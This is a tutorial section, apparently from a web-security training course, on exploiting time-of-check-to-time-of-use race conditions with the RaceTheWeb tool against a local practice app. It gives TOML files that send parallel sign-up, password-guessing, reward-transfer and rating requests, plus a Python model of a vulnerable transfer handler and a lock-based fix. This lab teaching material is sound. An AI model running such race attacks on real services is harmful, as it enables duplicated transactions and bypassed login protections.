More Tools
Start with whatever tools you may have. Better tools will be found as you go.

Using a tool can help you find and exploit TOCTOU issues. There are a couple of such tools available in the open-source world:
Name | Notes |
Browser Dev Tools | |
cURL | |
We will solve the last challenge using RaceTheWeb. The executable files for RaceTheWeb can be obtained from https://github.com/aaronhnatiw/race-the-web/releases
Which version to download? It depends on the operating system you are running.
Operating System | File to be downloaded |
Linux 32-bit | race-the-web_2.0.1_lin32.bin |
Linux 64-bit | race-the-web_2.0.1_lin64.bin |
macOS 32-bit | race-the-web_2.0.1_osx32.app.zip |
macOS 64-bit | race-the-web_2.0.1_osx64.app.zip |
Windows 32-bit | race-the-web_2.0.1_win32.exe |
Windows 64-bit | race-the-web_2.0.1_win64.exe |
On Linux and macOS machines, you need to make the file executable.
Downloaded file | Command to run in Terminal |
race-the-web_2.0.1_lin32.bin | chmod +x race-the-web_2.0.1_lin32.bin |
race-the-web_2.0.1_lin64.bin | chmod +x race-the-web_2.0.1_lin64.bin |
race-the-web_2.0.1_osx32.app.zip | Extract the zip file, then run chmod +x race-the-web_2.0.1_osx32.app |
race-the-web_2.0.1_osx64.app.zip | Extract the zip file, then run chmod +x race-the-web_2.0.1_osx64.app |
Running RaceTheWeb is easy:
- 1. Open command prompt/Terminal
- 2. Navigate to the directory where you have extracted/downloaded the executable binary file
- 3. Run the following command:

race-the-web <toml-file>
race-the-web portion:
Depending on the operating system you are using, the race-the-web portion needs to be changed.
Operating System | race-the-web portion |
Linux 32-bit | ./race-the-web_2.0.1_lin32.bin |
Linux 64-bit | ./race-the-web_2.0.1_lin64.bin |
macOS 32-bit | ./race-the-web_2.0.1_osx32.app |
macOS 64-bit | ./race-the-web_2.0.1_osx64.app |
Windows 32-bit | race-the-web_2.0.1_win32.exe |
Windows 64-bit | race-the-web_2.0.1_win64.exe |
<toml-file> portion:
TOML stands for Tom’s Obvious Minimal Language. The TOML file you supply should contain the request details so that race-the-web can send them.
TOML files for some of the TimeGap Theory challenges are given below:
# Sign Up
count = 10
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/sign-up.php"
body = "firstname=tom&password=tom&email=tom%40example.com&rewards=100"
In the above TOML file:
- Count defines how many copies of each request the RaceTheWeb tool sends in parallel
- Verbose defines the verbosity of the output displayed on the screen. Its value can be either true or false
- Method defines the type of the request. This can be GET, POST, PUT, DELETE, etc.
- URL is the URL to which the request is sent
- Body is the body of the request. You can skip this part if there is no body to submit
# Sign In Page
count = 1
verbose = true
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=1234&submit=Submit"
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=password&submit=Submit"
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=tom&submit=Submit"
In the above TOML file:
- Count is 1. However, there are three requests in the file. As such, the RaceTheWeb tool will send three parallel requests
- The first two requests have a wrong password in the request body
# Transfer Rewards
count = 10
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/transfer-rewards.php"
body = "from=tom%40sechow.com&to=jerry%40sechow.com&amount=100&submit=Submit"
# Ratings page
count = 1
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
body = "token=ae13e0f1df6412dc4b9e2a9a3354320b6c1f3a65160bcffb552495759870afa3"
cookies = ["PHPSESSID=80c3ffddbfe4771dd408b3c53d4a7a44"]
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
body = "token=bc5091b2f60da51d203a58b2af1c8bd99a443751adb206814d22df79e335a3e5"
cookies = ["PHPSESSID=fab00a2f7f46e33bb57deb4e08153e52"]
In the above TOML file, we are sending a cookie as well.
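The Transfer Rewards file above sends ten identical transfers at once. This added example (not code from TimeGap Theory or RaceTheWeb) models the server side of such a request, with the check-then-update handler next to a version that does both steps under one lock. The `RewardsStore` class, the handler names and the starting balance of 100 are assumptions made for illustration; a barrier forces the worst-case timing so the result is repeatable.

```python
import threading
import time

class RewardsStore:
    """Constructed in-memory stand-in for the rewards table (not the app's code)."""
    def __init__(self, balances):
        self.balances = dict(balances)
        self.lock = threading.Lock()

    def transfer_vulnerable(self, src, dst, amount, gap):
        # Time of check: the balance is read and validated...
        if self.balances[src] < amount:
            return False
        gap()  # ...the time gap in which other requests pass the same check...
        # Time of use: the balance is changed based on the now stale check.
        self.balances[src] -= amount
        self.balances[dst] += amount
        return True

    def transfer_hardened(self, src, dst, amount, gap):
        # Check and update share one critical section, so no other request
        # can act on a balance that is about to change.
        with self.lock:
            if self.balances[src] < amount:
                return False
            gap()
            self.balances[src] -= amount
            self.balances[dst] += amount
            return True

def run_parallel(hardened, count=10, amount=100):
    """Send `count` identical transfers at once, like count = 10 in the TOML file."""
    store = RewardsStore({"tom": 100, "jerry": 0})  # constructed sample data
    handler = store.transfer_hardened if hardened else store.transfer_vulnerable
    # Vulnerable run: the barrier makes every request finish its check before any update.
    gap = (lambda: time.sleep(0.001)) if hardened else threading.Barrier(count).wait
    results = []
    def worker():
        results.append(handler("tom", "jerry", amount, gap))
    threads = [threading.Thread(target=worker) for _ in range(count)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), store.balances  # (accepted transfers, final balances)

if __name__ == "__main__":
    print(run_parallel(hardened=False), run_parallel(hardened=True))
```

In a database-backed application the same effect as the lock comes from doing the check and the update in one transaction with a row lock, or in a single conditional UPDATE statement.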
Now you know:
- 1. Various open-source tools and techniques for finding and exploiting TOCTOU security issues
- 2. How to use RaceTheWeb tool for exploiting TOCTOU security issues
- 3. Writing TOML files for RaceTheWeb tool